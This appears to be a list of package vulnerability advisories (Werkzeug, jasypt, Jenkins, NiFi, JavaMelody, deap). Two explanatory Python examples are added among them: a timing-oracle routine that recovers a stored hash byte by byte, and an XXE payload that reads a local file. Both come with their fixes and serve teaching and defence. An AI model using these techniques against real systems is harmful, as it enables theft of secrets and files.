Cross-site scripting (XSS) vulnerability in the render_full function in debug/tbtools.py in the debugger in Pallets Werkzeug before 0.11.11 (as used in Pallets Flask and other products) allows remote attackers to inject arbitrary web script or HTML via…
[org.jasypt:jasypt] Exposure of Sensitive Information to an Unauthorized Actor in Apache Jasypt
jasypt before 1.9.2 allows a timing attack against the password hash comparison.
References
https://nvd.nist.gov/vuln/detail/CVE-2014-9970
https://access.redhat.com/errata/RHSA-2017:2546
https://access.redhat.com/errata/RHSA-2017:2547
https://access.r…
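What "a timing attack against the password hash comparison" means in practice, as an added example that is not jasypt's code (jasypt is Java; this is Python, and the names `leaky_compare`, `constant_time_compare`, `recover_with_timing_oracle`, `STORED_HASH` and `demo` are this example's own). The early-exit loop returns as soon as one byte differs, so the time it takes grows with the length of the matching prefix; here that time is idealised as a count of bytes examined. The recovery routine generalises beyond the password-hash case to any check of this shape where the attacker supplies the compared bytes directly (API tokens, webhook signatures): it needs at most 256 probes per byte rather than 256 to the power of the length. `STORED_HASH` is a constructed stand-in, not jasypt's digest format.

```python
from __future__ import annotations

import hashlib
import hmac


def leaky_compare(expected: bytes, candidate: bytes) -> tuple[bool, int]:
    """Early-exit comparison: the pattern the advisory describes.

    Returns (equal, bytes_examined). The count stands in for the time an
    attacker would measure: it grows with the length of the matching prefix,
    and that dependency is the side channel.
    """
    if len(expected) != len(candidate):
        return False, 0
    examined = 0
    for a, b in zip(expected, candidate):
        examined += 1
        if a != b:
            return False, examined
    return True, examined


def constant_time_compare(expected: bytes, candidate: bytes) -> bool:
    """Fixed form: hmac.compare_digest touches every byte whatever the first
    mismatch position, so the time taken says nothing about the prefix."""
    return hmac.compare_digest(expected, candidate)


def recover_with_timing_oracle(oracle, length: int) -> bytes:
    """Turn the leak into full recovery, one byte at a time.

    `oracle(probe)` returns (equal, bytes_examined) for a candidate; a real
    attacker derives the second value from response timing, averaged over
    many requests. At most 256 probes per byte instead of 256**length.
    """
    known = b""
    for pos in range(length):
        best_guess, best_examined = 0, -1
        for guess in range(256):
            probe = known + bytes([guess]) + bytes(length - pos - 1)
            equal, examined = oracle(probe)
            if equal:
                return probe              # full match: finished early
            if examined > best_examined:  # longest matching prefix so far
                best_guess, best_examined = guess, examined
        known += bytes([best_guess])
    return known


# Constructed stand-in for a stored digest; not a real jasypt hash format.
STORED_HASH = hashlib.sha256(b"correct horse battery staple").digest()


def demo() -> bool:
    """Recover STORED_HASH through the leaky comparison, then show that the
    constant-time check still accepts the recovered value."""
    oracle = lambda candidate: leaky_compare(STORED_HASH, candidate)
    recovered = recover_with_timing_oracle(oracle, len(STORED_HASH))
    return recovered == STORED_HASH and constant_time_compare(STORED_HASH, recovered)


if __name__ == "__main__":
    print("recovered via timing side channel:", demo())
```

The fix is the one-line swap to `hmac.compare_digest` (Java's equivalent is `MessageDigest.isEqual`); the length check on both sides should also not short-circuit differently for attacker-visible paths, which is why the constant-time helper takes both values whole rather than comparing lengths first and returning early.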
[org.jenkins-ci.main:jenkins-core] Deserialization of Untrusted Data in Jenkins
Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an XStream issue: a Java crash when XStream tries to instantiate void/Void.
References
https://nvd.nist.gov/vuln/detail/CVE-2017-1000355
https://jenkins.io/security/advisory/2017-0…
[org.jenkins-ci.main:jenkins-core] Cross-Site Request Forgery in Jenkins
Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to a CSRF issue in the Jenkins user database authentication realm: an attacker can create an account if signup is enabled, or create an account if the victim is an administrator, possibly d…
[org.jenkins-ci.main:jenkins-core] Improper Authentication in Jenkins
Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to a login command which allowed impersonating any Jenkins user. The login command available in the remoting-based CLI stored the encrypted user name of the successfully…
[org.jenkins-ci.plugins:junit] Improper Restriction of XML External Entity Reference in Jenkins JUnit Plugin
Jenkins JUnit Plugin 1.23 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, …
[django-anymail] django-anymail Includes Sensitive Information in Log Files
django-anymail versions 0.2 through 1.3 contain a CWE-532/CWE-209 vulnerability (sensitive information written to log files and error messages) involving the WEBHOOK_AUTHORIZATION setting value; an attacker with access to error logs could fabricate email tracking events. This attack appears t…
[org.apache.nifi:nifi] Improper Restriction of XML External Entity Reference in Apache NiFi
Apache NiFi has an XML External Entity (XXE) issue in the SplitXML processor. Malicious XML content could cause information disclosure or remote code execution. The fix to disable external general entity parsing and disallow doctype declarations was applied on the Apac…
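The JUnit Plugin and NiFi entries above describe the same defect and the same fix: a parser that resolves external general entities lets a file it processes read files off the host, and the remedy is to stop resolving external entities and refuse DOCTYPE declarations outright. The following is an added example, not code from either project (both are Java); it uses Python's xml.sax with the same two parser settings so the effect can be seen end to end. The secret file, the JUnit-style payload and the names `parse_resolving_external_entities`, `parse_hardened`, `NoDoctype`, `DoctypeRejected`, `write_secret_file`, `xxe_payload` and `demo` are constructed for the example.

```python
from __future__ import annotations

import io
import os
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             feature_external_pes, property_lexical_handler)


class TextCollector(ContentHandler):
    """Collects character data so we can see what the parser expanded."""

    def __init__(self) -> None:
        super().__init__()
        self.parts: list[str] = []

    def characters(self, content: str) -> None:
        self.parts.append(content)

    def text(self) -> str:
        return "".join(self.parts)


class DoctypeRejected(Exception):
    pass


class NoDoctype:
    """SAX lexical handler whose only job is to refuse any DOCTYPE, which is
    where entity declarations (external or not) live."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed")

    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass


def parse_resolving_external_entities(xml_bytes: bytes) -> str:
    """The behaviour the advisories describe: external general entities are
    fetched and expanded. Python 3.7.1+ disables this by default; it is turned
    back on here to show the effect (older Pythons had it on by default)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def parse_hardened(xml_bytes: bytes) -> str:
    """The NiFi fix: no external entity resolution, and no DOCTYPE at all
    (which also blocks internal-entity expansion bombs)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    parser.setProperty(property_lexical_handler, NoDoctype())
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def write_secret_file(content: bytes) -> str:
    """Constructed stand-in for a secret on the parsing host, such as a
    credentials file on a CI master."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return path


def xxe_payload(path: str) -> bytes:
    """A JUnit-style result file whose external entity points at a local file.
    The reference sits in element content; XML forbids external entities in
    attribute values, so that is where a real payload has to put it."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE testsuite [<!ENTITY xxe SYSTEM "{path}">]>\n'
        '<testsuite><testcase name="t"><system-out>&xxe;</system-out>'
        '</testcase></testsuite>'
    ).encode()


def demo() -> dict:
    path = write_secret_file(b"ci-deploy-token")
    try:
        payload = xxe_payload(path)
        leaked = parse_resolving_external_entities(payload)   # secret appears in output
        try:
            parse_hardened(payload)
            rejected = False
        except DoctypeRejected:
            rejected = True
        clean = parse_hardened(b"<testsuite><testcase name='t'>"
                               b"<system-out>ok</system-out></testcase></testsuite>")
    finally:
        os.unlink(path)
    return {"leaked": leaked, "hardened_rejected": rejected, "hardened_plain": clean}


if __name__ == "__main__":
    print(demo())
```

The file read is the information-disclosure case from the advisories; pointing the SYSTEM identifier at an http URL instead gives the server-side request forgery case with no change to the parser. Refusing the DOCTYPE rather than only disabling external entities is the more robust of the two settings, because a document that needs no DTD has no legitimate reason to carry one.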
[net.bull.javamelody:javamelody-core] Cross-site Scripting in JavaMelody
JavaMelody through 1.60.0 has XSS via the counter parameter in a clear_counter action to the /monitoring URI.
References
https://nvd.nist.gov/vuln/detail/CVE-2018-12432
https://github.com/Hurdano/JavaMelody-XSS/wiki/Attack-Vector—JavaMelody
https://…
[deap] Improper Input Validation in Deap
The utilities function in all versions < 1.0.1 of the deap node module can be tricked into modifying the prototype of Object when the attacker can control part of the structure passed to this function. This can let an attacker add or modify existing…